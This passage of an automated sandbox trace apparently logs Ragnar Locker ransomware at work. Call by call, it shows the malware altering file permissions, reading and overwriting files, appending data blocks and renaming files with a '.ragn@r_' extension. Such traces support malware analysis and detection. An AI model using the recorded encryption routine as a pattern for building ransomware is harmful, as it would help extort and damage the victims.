lpNumberOfBytesWritten=0x5affb64*=0x100, lpOverlapped=0x0) returned 1 [0172.541] WriteFile (in: hFile=0x3bc, lpBuffer=0x361349c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affb64, lpOverlapped=0x0 | out: lpBuffer=0x361349c*, lpNumberOfBytesWritten=0x5affb64*=0x100, lpOverlapped=0x0) returned 1 [0172.541] WriteFile (in: hFile=0x3bc, lpBuffer=0x5affb68*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5affb64, lpOverlapped=0x0 | out: lpBuffer=0x5affb68*, lpNumberOfBytesWritten=0x5affb64*=0xf, lpOverlapped=0x0) returned 1 [0172.542] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0172.542] GetProcessHeap () returned 0x3520000 [0172.542] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584b50 | out: hHeap=0x3520000) returned 1 [0172.542] CloseHandle (hObject=0x3bc) returned 1 [0172.543] lstrcpyW (in: lpString1=0x5aff6d4, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf" [0172.543] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf.ragn@r_B8CF767A" [0172.543] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\eula.rtf.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1035\\eula.rtf.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 200 os_tid = 0xcfc [0172.555] GetNamedSecurityInfoW () returned 0x0 [0172.556] SetEntriesInAclW () returned 0x0 [0172.556] SetNamedSecurityInfoW () returned 0x0 [0172.556] LocalFree (hMem=0x358a128) returned 0x0 [0172.556] LocalFree (hMem=0x358a13c) returned 0x358a13c [0172.557] LocalFree (hMem=0x5d4ff20) returned 0x0 [0172.557] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml")) returned 0x20 [0172.557] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0172.557] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5effd34 | out: lpFileSize=0x5effd34*=77022) returned 1 [0172.557] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x12ccf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.557] GetProcessHeap () returned 0x3520000 [0172.557] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584b50 [0172.557] ReadFile (in: hFile=0x3bc, lpBuffer=0x3584b50, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5effcec, lpOverlapped=0x0 | out: lpBuffer=0x3584b50*, lpNumberOfBytesRead=0x5effcec*=0xf, lpOverlapped=0x0) returned 1 [0172.655] VirtualAlloc (lpAddress=0x0, dwSize=0x12cde, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0172.656] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.656] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5effd08 | out: lpNewFilePointer=0x0) returned 1 [0172.656] ReadFile (in: hFile=0x3bc, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x12cde, lpNumberOfBytesRead=0x5effcdc, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5effcdc*=0x12cde, lpOverlapped=0x0) returned 1 [0172.672] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5effce0 | out: lpNewFilePointer=0x0) returned 1 [0172.673] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x12cde, nNumberOfBytesToLockHigh=0x0) returned 1 [0172.673] WriteFile (in: hFile=0x3bc, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x12cde, lpNumberOfBytesWritten=0x5effcd8, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5effcd8*=0x12cde, lpOverlapped=0x0) returned 1 [0172.674] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x12cde, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0172.674] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.675] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x12cde, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.676] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0172.676] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1cfbc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5effd18, lpOverlapped=0x0 | out: lpBuffer=0x5d1cfbc*, lpNumberOfBytesWritten=0x5effd18*=0x100, lpOverlapped=0x0) returned 1 [0172.676] WriteFile (in: hFile=0x3bc, lpBuffer=0x5d1d0bc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5effd18, lpOverlapped=0x0 | out: lpBuffer=0x5d1d0bc*, lpNumberOfBytesWritten=0x5effd18*=0x100, lpOverlapped=0x0) returned 1 [0172.676] WriteFile (in: hFile=0x3bc, lpBuffer=0x5effd1c*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5effd18, lpOverlapped=0x0 | out: lpBuffer=0x5effd1c*, lpNumberOfBytesWritten=0x5effd18*=0xf, lpOverlapped=0x0) returned 1 [0172.676] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0172.676] GetProcessHeap () returned 0x3520000 [0172.676] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584b50 | out: hHeap=0x3520000) returned 1 [0172.676] CloseHandle (hObject=0x3bc) returned 1 [0172.689] lstrcpyW (in: lpString1=0x5eff888, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" [0172.689] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.ragn@r_B8CF767A" [0172.689] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1035\\LocalizedData.xml.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1035\\localizeddata.xml.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 201 os_tid = 0xa70 [0172.814] GetNamedSecurityInfoW () returned 0x0 [0172.815] SetEntriesInAclW () returned 0x0 [0172.815] SetNamedSecurityInfoW () returned 0x0 [0172.816] LocalFree (hMem=0x358b1b0) returned 0x0 [0172.816] LocalFree (hMem=0x358b1c4) returned 0x358b1c4 [0172.816] LocalFree (hMem=0x5d4ff20) returned 0x0 [0172.816] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf")) returned 0x20 [0172.816] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0172.816] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5affc68 | out: lpFileSize=0x5affc68*=3526) returned 1 [0172.816] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0xdb7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.816] GetProcessHeap () returned 0x3520000 [0172.817] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584b50 [0172.817] ReadFile (in: hFile=0x3bc, lpBuffer=0x3584b50, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5affc20, lpOverlapped=0x0 | out: lpBuffer=0x3584b50*, lpNumberOfBytesRead=0x5affc20*=0xf, lpOverlapped=0x0) returned 1 [0172.842] VirtualAlloc (lpAddress=0x0, dwSize=0xdc6, flAllocationType=0x3000, flProtect=0x4) returned 0x3510000 [0172.843] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.843] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affc3c | out: lpNewFilePointer=0x0) returned 1 [0172.843] ReadFile (in: hFile=0x3bc, lpBuffer=0x3510000, nNumberOfBytesToRead=0xdc6, lpNumberOfBytesRead=0x5affc10, lpOverlapped=0x0 | out: lpBuffer=0x3510000*, lpNumberOfBytesRead=0x5affc10*=0xdc6, lpOverlapped=0x0) returned 1 [0172.843] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affc14 | out: lpNewFilePointer=0x0) returned 1 [0172.843] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xdc6, nNumberOfBytesToLockHigh=0x0) returned 1 [0172.844] WriteFile (in: hFile=0x3bc, lpBuffer=0x3510000*, nNumberOfBytesToWrite=0xdc6, lpNumberOfBytesWritten=0x5affc0c, lpOverlapped=0x0 | out: lpBuffer=0x3510000*, lpNumberOfBytesWritten=0x5affc0c*=0xdc6, lpOverlapped=0x0) returned 1 [0172.844] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xdc6, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0172.844] VirtualFree (lpAddress=0x3510000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.844] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0xdc6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.844] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0172.844] WriteFile (in: hFile=0x3bc, lpBuffer=0x361339c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affc4c, lpOverlapped=0x0 | out: lpBuffer=0x361339c*, lpNumberOfBytesWritten=0x5affc4c*=0x100, lpOverlapped=0x0) returned 1 [0172.845] WriteFile (in: hFile=0x3bc, lpBuffer=0x361349c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5affc4c, lpOverlapped=0x0 | out: lpBuffer=0x361349c*, lpNumberOfBytesWritten=0x5affc4c*=0x100, lpOverlapped=0x0) returned 1 [0172.845] WriteFile (in: hFile=0x3bc, lpBuffer=0x5affc50*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5affc4c, lpOverlapped=0x0 | out: lpBuffer=0x5affc50*, lpNumberOfBytesWritten=0x5affc4c*=0xf, lpOverlapped=0x0) returned 1 [0172.845] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0172.845] GetProcessHeap () returned 0x3520000 [0172.845] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584b50 | out: hHeap=0x3520000) returned 1 [0172.845] CloseHandle (hObject=0x3bc) returned 1 [0172.846] lstrcpyW (in: lpString1=0x5aff7bc, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf" [0172.846] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf.ragn@r_B8CF767A" [0172.846] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 202 os_tid = 0x58 [0172.819] GetNamedSecurityInfoW () returned 0x0 [0172.820] SetEntriesInAclW () returned 0x0 [0172.820] SetNamedSecurityInfoW () returned 0x0 [0172.820] LocalFree (hMem=0x358b880) returned 0x0 [0172.821] LocalFree (hMem=0x358b894) returned 0x358b894 [0172.821] LocalFree (hMem=0x5d4ff20) returned 0x0 [0172.821] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml")) returned 0x20 [0172.821] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3b8 [0172.821] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x5eff9c4 | out: lpFileSize=0x5eff9c4*=82962) returned 1 [0172.821] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x14403, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.821] GetProcessHeap () returned 0x3520000 [0172.821] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584bb0 [0172.821] ReadFile (in: hFile=0x3b8, lpBuffer=0x3584bb0, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5eff97c, lpOverlapped=0x0 | out: lpBuffer=0x3584bb0*, lpNumberOfBytesRead=0x5eff97c*=0xf, lpOverlapped=0x0) returned 1 [0172.838] VirtualAlloc (lpAddress=0x0, dwSize=0x14412, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0172.840] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.840] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5eff998 | out: lpNewFilePointer=0x0) returned 1 [0172.840] ReadFile (in: hFile=0x3b8, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x14412, lpNumberOfBytesRead=0x5eff96c, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5eff96c*=0x14412, lpOverlapped=0x0) returned 1 [0172.861] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5eff970 | out: lpNewFilePointer=0x0) returned 1 [0172.862] LockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x14412, nNumberOfBytesToLockHigh=0x0) returned 1 [0172.862] WriteFile (in: hFile=0x3b8, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x14412, lpNumberOfBytesWritten=0x5eff968, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5eff968*=0x14412, lpOverlapped=0x0) returned 1 [0172.863] UnlockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x14412, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0172.863] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0172.864] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x14412, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.864] LockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0172.864] WriteFile (in: hFile=0x3b8, lpBuffer=0x5d1cfbc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5eff9a8, lpOverlapped=0x0 | out: lpBuffer=0x5d1cfbc*, lpNumberOfBytesWritten=0x5eff9a8*=0x100, lpOverlapped=0x0) returned 1 [0172.864] WriteFile (in: hFile=0x3b8, lpBuffer=0x5d1d0bc*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5eff9a8, lpOverlapped=0x0 | out: lpBuffer=0x5d1d0bc*, lpNumberOfBytesWritten=0x5eff9a8*=0x100, lpOverlapped=0x0) returned 1 [0172.864] WriteFile (in: hFile=0x3b8, lpBuffer=0x5eff9ac*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5eff9a8, lpOverlapped=0x0 | out: lpBuffer=0x5eff9ac*, lpNumberOfBytesWritten=0x5eff9a8*=0xf, lpOverlapped=0x0) returned 1 [0172.864] UnlockFile (hFile=0x3b8, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0172.864] GetProcessHeap () returned 0x3520000 [0172.864] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584bb0 | out: hHeap=0x3520000) returned 1 [0172.865] CloseHandle (hObject=0x3b8) returned 1 [0172.868] lstrcpyW (in: lpString1=0x5eff518, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml") returned="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" [0172.868] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.ragn@r_B8CF767A" [0172.868] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 203 os_tid = 0xa8c [0173.074] GetNamedSecurityInfoW () returned 0x0 [0173.075] SetEntriesInAclW () returned 0x0 [0173.075] SetNamedSecurityInfoW () returned 0x0 [0173.076] LocalFree (hMem=0x358c5d8) returned 0x0 [0173.076] LocalFree (hMem=0x358c5ec) returned 0x358c5ec [0173.076] LocalFree (hMem=0x5d4ff20) returned 0x0 [0173.076] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf")) returned 0x20 [0173.076] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3bc [0173.076] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x5aff7ac | out: lpFileSize=0x5aff7ac*=6851) returned 1 [0173.077] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x1ab4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.077] GetProcessHeap () returned 0x3520000 [0173.077] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584b50 [0173.077] ReadFile (in: hFile=0x3bc, lpBuffer=0x3584b50, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5aff764, lpOverlapped=0x0 | out: lpBuffer=0x3584b50*, lpNumberOfBytesRead=0x5aff764*=0xf, lpOverlapped=0x0) returned 1 [0173.079] VirtualAlloc (lpAddress=0x0, dwSize=0x1ac3, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0173.079] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.079] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5aff780 | out: lpNewFilePointer=0x0) returned 1 [0173.080] ReadFile (in: hFile=0x3bc, lpBuffer=0x2f70000, nNumberOfBytesToRead=0x1ac3, lpNumberOfBytesRead=0x5aff754, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesRead=0x5aff754*=0x1ac3, lpOverlapped=0x0) returned 1 [0173.080] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5aff758 | out: lpNewFilePointer=0x0) returned 1 [0173.080] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x1ac3, nNumberOfBytesToLockHigh=0x0) returned 1 [0173.081] WriteFile (in: hFile=0x3bc, lpBuffer=0x2f70000*, nNumberOfBytesToWrite=0x1ac3, lpNumberOfBytesWritten=0x5aff750, lpOverlapped=0x0 | out: lpBuffer=0x2f70000*, lpNumberOfBytesWritten=0x5aff750*=0x1ac3, lpOverlapped=0x0) returned 1 [0173.081] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x1ac3, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0173.081] VirtualFree (lpAddress=0x2f70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0173.082] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x1ac3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.082] LockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10f, nNumberOfBytesToLockHigh=0x0) returned 1 [0173.082] WriteFile (in: hFile=0x3bc, lpBuffer=0x361339c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5aff790, lpOverlapped=0x0 | out: lpBuffer=0x361339c*, lpNumberOfBytesWritten=0x5aff790*=0x100, lpOverlapped=0x0) returned 1 [0173.082] WriteFile (in: hFile=0x3bc, lpBuffer=0x361349c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x5aff790, lpOverlapped=0x0 | out: lpBuffer=0x361349c*, lpNumberOfBytesWritten=0x5aff790*=0x100, lpOverlapped=0x0) returned 1 [0173.082] WriteFile (in: hFile=0x3bc, lpBuffer=0x5aff794*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x5aff790, lpOverlapped=0x0 | out: lpBuffer=0x5aff794*, lpNumberOfBytesWritten=0x5aff790*=0xf, lpOverlapped=0x0) returned 1 [0173.082] UnlockFile (hFile=0x3bc, dwFileOffsetLow=0x1, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0173.083] GetProcessHeap () returned 0x3520000 [0173.083] HeapFree (in: hHeap=0x3520000, dwFlags=0x1, lpMem=0x3584b50 | out: hHeap=0x3520000) returned 1 [0173.083] CloseHandle (hObject=0x3bc) returned 1 [0173.084] lstrcpyW (in: lpString1=0x5aff300, lpString2="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf") returned="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf" [0173.084] lstrcatW (in: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf", lpString2=".ragn@r_B8CF767A" | out: lpString1="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf.ragn@r_B8CF767A") returned="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf.ragn@r_B8CF767A" [0173.084] MoveFileExW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\eula.rtf.ragn@r_B8CF767A" (normalized: "c:\\588bce7c90097ed212\\1037\\eula.rtf.ragn@r_b8cf767a"), dwFlags=0x3) returned 1 Thread: id = 204 os_tid = 0xe78 [0173.198] GetNamedSecurityInfoW () returned 0x0 [0173.199] SetEntriesInAclW () returned 0x0 [0173.199] SetNamedSecurityInfoW () returned 0x0 [0173.200] LocalFree (hMem=0x358c408) returned 0x0 [0173.200] LocalFree (hMem=0x358c41c) returned 0x358c41c [0173.200] LocalFree (hMem=0x5d4ff20) returned 0x0 [0173.200] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml")) returned 0x20 [0173.200] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1037\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1037\\localizeddata.xml"), dwDesiredAccess=0x40000005, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x10000080, hTemplateFile=0x0) returned 0x3b8 [0173.200] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x5affd1c | out: lpFileSize=0x5affd1c*=72076) returned 1 [0173.200] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x1197d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.200] GetProcessHeap () returned 0x3520000 [0173.200] RtlAllocateHeap (HeapHandle=0x3520000, Flags=0x8, Size=0xf) returned 0x3584b50 [0173.201] ReadFile (in: hFile=0x3b8, lpBuffer=0x3584b50, nNumberOfBytesToRead=0xf, lpNumberOfBytesRead=0x5affcd4, lpOverlapped=0x0 | out: lpBuffer=0x3584b50*, lpNumberOfBytesRead=0x5affcd4*=0xf, lpOverlapped=0x0) returned 1 [0173.345] VirtualAlloc (lpAddress=0x0, dwSize=0x1198c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f70000 [0173.345] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.345] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x5affcf0 | out: lpNewFilePointer=0x0) returned 1 [0173.345] ReadFile (in: 